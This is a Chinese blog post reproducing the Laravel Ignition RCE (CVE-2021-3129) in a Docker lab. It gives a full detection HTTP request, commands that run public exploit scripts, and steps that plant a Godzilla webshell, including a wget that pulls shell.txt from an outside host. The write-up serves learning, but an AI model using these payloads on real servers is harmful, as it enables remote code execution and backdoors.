目錄
參考
環(huán)境搭建
漏洞分析
漏洞檢測
漏洞利用
第一種方法 這個主要是關(guān)于工具腳本
第二種方法
參考
CVE-2021-3129 分析-云社區(qū)-華為云
環(huán)境搭建
我們這里通過docker來搞環(huán)境
https://github.com/SNCKER/CVE-2021-3129
//通過git復(fù)制過來
git clone https://github.com/SNCKER/CVE-2021-3129
//來到這個文件夾中
cd CVE*
//使用docker啟動,沒有docker-compose kali可以通過apt安裝
docker-compose up -d
docker ps //查看開啟的環(huán)境
//查看自己ip,然后訪問
http://ip:8888
點擊這個key,然后點擊那里有橫線的
?
漏洞分析
漏洞檢測
?這里使用burp方便一點,下面是檢測有沒有漏洞的poc
POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8000
Content-Length: 169
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Origin: http://localhost:8000
Referer: http://localhost:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "1",
"viewFile": "1"
}
}
我們接下來打開burp,在這里,我們將上面的復(fù)制進去。
點擊發(fā)送以后我們配置一下,這里使用自己環(huán)境機子的ip
最后響應(yīng)包中是500,便是存在漏洞。
漏洞利用
第一種方法
注:兩個exp我都沒有成功,但是有人成功,可能是我機子有問題,所以這里大家可以自己試試
第一個exp
這里我們git過來的文件中就有exp python文件
然后我們最后一行修改內(nèi)容為自己環(huán)境的ip和想執(zhí)行的命令
?但是我們這里需要phpggc的環(huán)境,這里有兩種方法:
1. git復(fù)制過來工具,git clone https://github.com/ambionics/phpggc.git
??? 這里注意exp文件要和工具在一個目錄中,這種不太推薦。
2. 我們使用kali直接下載這個工具,lsudo apt-get install phpggc
但是吧,這里也不坑大家,這里我屬實是沒有成功,里面的三個rce跑完了也沒有跑出來,但是也建議大家自己試試
所以我去github有找到了另一個exp,去嘗試嘗試。
第二個exp
#另一個exp
//還是使用git復(fù)制過來
git clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
//然后來到那個目錄中
cd laraver-CVE*
//這里要看自己的ip
python3 laravel-CVE-2021-3129-EXP.py http://192.168.1.16:8888
?
作者提示我們是使用哥斯拉的,這里都別用錯了。
?
但是這里又出現(xiàn)一個問題,就是我們連不上,這里自己分析一下問題。
1.寫進去的馬有問題
2.寫進去了但是文件是空
3.自己操作有問題
4.哥斯拉有問題
首先3可以排除了,這里操作基本沒什么問題。
然后就是4,這里我們生成一個php的馬,然后放到本地機中,可以連接,沒有問題
1和2都需要我們?nèi)ト萜髂夸浿锌纯?/p>
進入容器的方法可以看看這個docker進入容器中的方法
根目錄在/src/public中
我們發(fā)現(xiàn)了這個木馬,經(jīng)過查看沒有發(fā)現(xiàn)什么不對的,這里排除了2,接下來就是驗證馬的問題了
?
我們使用哥斯拉生成一個shell.php的馬,然后使用開啟apache之類,放到根目錄中,把后綴改成txt,然后我們使用wget下載過來。
//這里使用我們開啟網(wǎng)站的ip,看看自己的
wget http://192.168.1.5/shell.txt
//然后把后綴改回來
mv shell.txt shell.php
?
最終這個是連接上去了,這樣就是馬出了問題,我們查看一下兩個的區(qū)別。
?
我們發(fā)現(xiàn)這個有換行,那個沒換行,感覺就是這個問題了,但是有的人確實可以直接連接,會不會是我哥斯拉版本有點高。
?文章來源:http://www.zghlxwxcb.cn/news/detail-562373.html
第二種方法
?因為本人還是比較菜,不怎么分析的明白,這里建議還看看華為云開發(fā)者聯(lián)盟這里的文章來源地址http://www.zghlxwxcb.cn/news/detail-562373.html
到了這里,關(guān)于Laravel RCE(CVE-2021-3129)復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!